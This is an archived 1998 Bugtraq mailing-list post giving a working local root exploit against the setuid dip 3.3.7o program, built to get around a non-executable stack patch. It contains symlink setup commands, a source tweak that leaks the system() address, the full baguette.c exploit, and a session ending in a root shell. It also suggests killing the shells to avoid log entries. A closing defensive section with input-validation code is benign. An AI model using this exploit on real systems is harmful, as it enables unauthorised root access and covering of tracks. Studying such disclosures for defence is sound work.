[6755] in bugtraq
Cooking with the right dip(-3.3.7o)
daemon@ATHENA.MIT.EDU (Thomas Troeger)
Tue May 12 19:06:55 1998
Date: Wed, 13 May 1998 00:17:35 +0200
Reply-To: Thomas Troeger <tstroege@CIP.INFORMATIK.UNI-ERLANGEN.DE>
From: Thomas Troeger <tstroege@CIP.INFORMATIK.UNI-ERLANGEN.DE>
To: BUGTRAQ@NETSPACE.ORG
Hi,
After reading jamez's and zef's postings about dip and reviewing
its source code, I recalled Rafal Wojtczuk (nergal)'s post about defeating
Solar Designer's non-executable stack. I asked myself "Hmmm, let's see if
we can get a shell out of it even on a system with installed stackpatch."
So I developed the following recipe:
First, setup your directory like this:
-----------------------------------------------------------
ln -s /bin/sh a
ln -s /bin/sh aa
ln -s /bin/sh aaa
ln -s /bin/sh aaaa
ln -s /bin/sh aaaaa
ln -s /bin/sh aaaaaa
ln -s /bin/sh aaaaaaa
ln -s /usr/sbin/dip vul
-----------------------------------------------------------
Get the dip-3.3.7o-uri package and uncompress it. Take main.c and edit
it as follows (preferably with vi !! :) ):
------------------ dip-3.3.7o/main.c line 194+ -----------------------------
    fp = fopen(buf, "r");
    if (fp == (FILE *)0) {
        fprintf(stderr, "DIP: cannot open %s: %s\n",
                buf, strerror(errno));
+       fprintf(stderr, "labels: %p %p\n", &system, nam);
        return;
    }
----------------------------------------------------------------------------
Of course you can just use gdb and issue the "p system" command as well, that
avoids getting the package.
Now compile and run it, you get:
----------------------------------------------------------------------------
pigsnspace$ dip -k -l aaaa
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /usr/spool/uucp/LCK..aaaa: No such file or directory
labels: 0x80493e8 0xbffff6f0
----------------------------------------------------------------------------
Insert the first number you get into the following exploit:
-------------------------- baguette.c --------------------------------
/*
 * Program to get a shell from dip-3.3.7o-uri on a system with
 * Solar Designer's stackpatch installed.
 * by tstroege@cip.informatik.uni-erlangen.de
 * credits to jamez, zef and especially
 * Rafal Wojtczuk for his howto ;)
 *
 * Of course this is just for educational purposes :)
 */
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* memcpy, strcpy, strlen */
#include <unistd.h>   /* execve */
#define SYSTEM 0x80493e8
/* address of system entry */
#define SOMESTACK 0xbffffea0
/* address on stack where argv[1] should be. Usually somewhere on top */
int main(int argc, char *argv[]) {
    char *name[]={"./vul", "-k", "-l", NULL, NULL};
    char mem[1024], *ptr;
    int i, code[]={ SYSTEM, SOMESTACK, SOMESTACK, 0 }, off=atoi(argv[1]);
    /* fill the argument with the "aaaaaaa;" pattern (see the symlinks above) */
    for (ptr=mem, i=0; i < 1024; i+=8, ptr+=8) memcpy(ptr, "aaaaaaa;", 8);
    /* place the addresses at the offset given on the command line */
    ptr=mem+off;
    strcpy(ptr, (char *)&(code[0]));
    mem[1023]=0;
    name[3]=(char *)mem;
    printf("%s (%d/%d)\n", mem, (int)strlen(mem), off);
    execve(name[0], name, NULL);
    return 0;
}
----------------------------------------------------------------------
(SOMESTACK is somewhere above 0xbffff6f0, here it was 0xbffffea0)
Running this program should do. On my platform offset 113 did the job:
----------------------------------------------------------------------
pigsnspace$ gcc baguette.c -o exp
pigsnspace$ id
uid=1047(piggy) gid=100(users) groups=100(users)
pigsnspace$ ./exp 113
aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;a\xE8 \xFE\xFF\xBF \xFE\xFF\xBF (125/113)
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /var/lock/LCK..aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;a\xE8 \xFE\xFF\xBF \xFE\xFF\xBF: No such file or directory
pigsnspace# id
uid=1047(piggy) gid=100(users) euid=0(root) groups=100(users)
----------------------------------------------------------------------
Well, so much for this. You should keep in mind that getting the right offset
value (the 113 somewhere above) and the address of SYSTEM and SOMESTACK can
be difficult. Most probably this program will not work at once (see more about
it in nergal's article). Those values worked here, but you will have to
experiment.
After exiting the neat shells, you'll get a system log. So you should
maybe just kill them using kill ......
tst.
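For the defensive side: the root cause here is that dip copies the -l argument into a stack buffer without a length check and hands the result to a path that a shell-capable call can interpret. The example below shows how such a lock-file name can be validated and the path built with a bounded write. It is an added illustration, not dip's source or a patch to it; the lock directory, the 32-byte limit and the function names are my assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define LOCK_DIR      "/var/lock" /* assumed for this example, not dip's config */
#define MAX_LOCK_NAME 32          /* assumed length limit for the -l argument */

/* Returns 1 if name may be used as the <name> part of LCK..<name>: non-empty,
 * at most MAX_LOCK_NAME bytes, only [A-Za-z0-9_.-] and not starting with '.',
 * so it can carry neither shell metacharacters like ';' nor "../" components. */
int lock_name_is_safe(const char *name)
{
    size_t len, i;
    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > MAX_LOCK_NAME || name[0] == '.')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Builds LOCK_DIR/LCK..<name> into out with a bounded write instead of an
 * unchecked sprintf/strcpy. Returns 0 on success, -1 if the name is rejected
 * (out untouched) or the path does not fit (out emptied). */
int build_lock_path(const char *name, char *out, size_t outlen)
{
    int n;
    if (outlen == 0 || !lock_name_is_safe(name))
        return -1;
    n = snprintf(out, outlen, "%s/LCK..%s", LOCK_DIR, name);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Convenience wrapper: static path on success, NULL when rejected. */
const char *lock_path_for(const char *name)
{
    static char path[64];
    return build_lock_path(name, path, sizeof path) == 0 ? path : NULL;
}
```

With these checks the 125-byte "aaaaaaa;..." argument from the session above is refused before any copy into a fixed buffer happens, while an ordinary name such as aaaa still yields /var/lock/LCK..aaaa.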